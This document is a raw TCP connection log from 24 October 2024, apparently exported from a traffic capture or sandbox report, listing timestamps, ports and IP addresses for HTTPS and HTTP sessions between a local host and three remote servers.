                                                                Oct 24, 2024 08:43:20.676573992 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.676665068 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.676673889 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.676714897 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.679438114 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.679501057 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.679507971 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.679552078 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.682375908 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.682461977 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.682499886 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.682557106 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.685483932 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.685563087 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.685605049 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.685653925 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.688247919 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.688312054 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.688364983 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.688424110 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.691487074 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.691544056 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.691577911 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.691627979 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.694426060 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.694495916 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.694526911 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.694581985 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.697310925 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.697360039 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.697422028 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.697472095 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.700047016 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.700102091 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.700145960 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.700200081 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.703224897 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.703299999 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.703361034 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.703409910 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.705786943 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.705838919 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.705888033 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.705940008 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.708622932 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.708703995 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.708724022 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.708774090 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.711433887 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.711514950 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.711546898 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.711596012 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.713026047 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.713078976 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.713108063 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.713164091 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.715763092 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.715818882 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.715853930 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.716031075 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.720485926 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.720546007 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.720581055 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.720622063 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.722198963 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.722254038 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.722302914 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.722347975 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.724734068 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.724780083 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.724889994 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.724937916 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.727596998 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.727648973 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.727680922 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.727724075 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.731873035 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.731928110 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.732014894 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.732064009 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.737518072 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.737571001 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.737597942 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.737647057 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.785955906 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786060095 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786077023 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.786118031 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786132097 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.786160946 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.786166906 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786206007 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.786211967 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786251068 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.786252022 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786276102 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786297083 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.786328077 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.786334038 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786376953 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.786717892 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786762953 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.786775112 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786827087 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.786834002 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.786885977 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.787060022 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.787108898 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.787113905 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.787158012 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.787159920 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.787170887 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.787203074 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.787228107 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.787564993 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.787617922 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.787623882 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.787668943 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.787674904 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.787713051 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.788281918 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.788328886 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.788335085 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.788373947 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.790431976 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.790487051 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.790493965 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.790529966 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.795286894 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.795366049 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.795381069 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.795428991 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.798410892 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.798465014 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.798477888 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.798516989 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.801399946 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.801450014 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.801464081 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.801515102 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.804285049 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.804342031 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.804359913 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.804414034 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.807255983 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.807301998 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.807310104 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.807349920 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.810324907 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.810369968 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.810379028 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.810420990 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.813225985 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.813273907 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.813280106 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.813314915 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.816200972 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.816251040 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.816257000 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.816293955 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.819267035 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.819335938 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.819343090 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.819535971 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.821918964 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.821964979 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.821974993 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.822010994 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.824897051 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.824944973 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.824950933 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.824987888 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.824992895 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.825023890 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.827560902 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.827611923 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.827619076 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.827661991 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.830342054 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.830396891 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.830420017 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.830463886 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.832994938 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.833049059 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.833065987 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.833106995 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.835892916 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.835944891 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.835977077 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.836026907 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.838598013 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.838658094 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.838732004 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.838783979 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.841260910 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.841315985 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.841347933 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.841398954 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.841459990 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.841509104 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.841536045 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.841586113 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.845333099 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.845385075 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.845411062 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.845453978 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.850984097 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.851043940 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.851068020 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.851114035 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.856591940 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.856653929 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.856686115 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.856734991 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.905921936 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.906008959 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.906079054 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.906127930 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.906167030 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.906318903 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.906393051 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.906400919 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.906430960 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.906452894 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.906476974 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.906518936 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.906584978 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.906598091 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.906599045 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.906651020 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.906673908 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.906729937 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.906773090 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:20.906851053 CEST44349747142.250.185.65192.168.2.4
                                                                Oct 24, 2024 08:43:20.906913996 CEST49747443192.168.2.4142.250.185.65
                                                                Oct 24, 2024 08:43:21.781753063 CEST4976880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:21.787090063 CEST8049768193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:21.787157059 CEST4976880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:21.787389994 CEST4976880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:21.793502092 CEST8049768193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:22.623219013 CEST8049768193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:22.627597094 CEST4976880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:22.633219004 CEST8049768193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:22.871488094 CEST8049768193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:22.914099932 CEST4976880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:23.250164986 CEST49779443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:23.250264883 CEST44349779188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:23.250359058 CEST49779443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:23.251930952 CEST49779443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:23.251966953 CEST44349779188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:23.999797106 CEST44349779188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:23.999877930 CEST49779443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:24.003997087 CEST49779443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:24.004008055 CEST44349779188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:24.004401922 CEST44349779188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:24.008259058 CEST49779443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:24.051342964 CEST44349779188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:24.420715094 CEST44349779188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:24.420838118 CEST44349779188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:24.420979023 CEST49779443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:24.427489996 CEST49779443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:24.437287092 CEST4976880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:24.442720890 CEST8049768193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:24.681509018 CEST8049768193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:24.688694954 CEST49790443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:24.688746929 CEST44349790188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:24.689007998 CEST49790443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:24.689378023 CEST49790443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:24.689389944 CEST44349790188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:24.899486065 CEST8049768193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:24.899601936 CEST4976880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:25.303729057 CEST44349790188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:25.305592060 CEST49790443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:25.305619955 CEST44349790188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:25.444928885 CEST44349790188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:25.445038080 CEST44349790188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:25.445081949 CEST49790443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:25.445806026 CEST49790443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:25.451886892 CEST4976880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:25.453314066 CEST4979380192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:25.457530975 CEST8049768193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:25.457596064 CEST4976880192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:25.458626032 CEST8049793193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:25.458703041 CEST4979380192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:25.458825111 CEST4979380192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:25.464071035 CEST8049793193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:26.305701971 CEST8049793193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:26.306999922 CEST49797443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:26.307054043 CEST44349797188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:26.307132006 CEST49797443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:26.307430983 CEST49797443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:26.307446957 CEST44349797188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:26.414108038 CEST4979380192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:26.918260098 CEST44349797188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:26.921833038 CEST49797443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:26.921875954 CEST44349797188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:27.062279940 CEST44349797188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:27.062527895 CEST44349797188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:27.062720060 CEST49797443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:27.063148022 CEST49797443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:27.071110964 CEST4980380192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:27.076478004 CEST8049803193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:27.078905106 CEST4980380192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:27.078985929 CEST4980380192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:27.084336042 CEST8049803193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:27.928158045 CEST8049803193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:27.930563927 CEST49809443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:27.930613995 CEST44349809188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:27.930696964 CEST49809443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:27.931247950 CEST49809443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:27.931257963 CEST44349809188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:27.976674080 CEST4980380192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:28.543004990 CEST44349809188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:28.544662952 CEST49809443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:28.544693947 CEST44349809188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:28.684617996 CEST44349809188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:28.684751987 CEST44349809188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:28.684818029 CEST49809443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:28.685427904 CEST49809443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:28.711549997 CEST4980380192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:28.712526083 CEST4981580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:28.717257977 CEST8049803193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:28.717353106 CEST4980380192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:28.717854977 CEST8049815193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:28.717935085 CEST4981580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:28.718022108 CEST4981580192.168.2.4193.122.6.168
                                                                Oct 24, 2024 08:43:28.723381042 CEST8049815193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:29.551281929 CEST8049815193.122.6.168192.168.2.4
                                                                Oct 24, 2024 08:43:29.552642107 CEST49821443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:29.552695990 CEST44349821188.114.97.3192.168.2.4
                                                                Oct 24, 2024 08:43:29.552764893 CEST49821443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:29.553054094 CEST49821443192.168.2.4188.114.97.3
                                                                Oct 24, 2024 08:43:29.553067923 CEST44349821188.114.97.3192.168.2.4
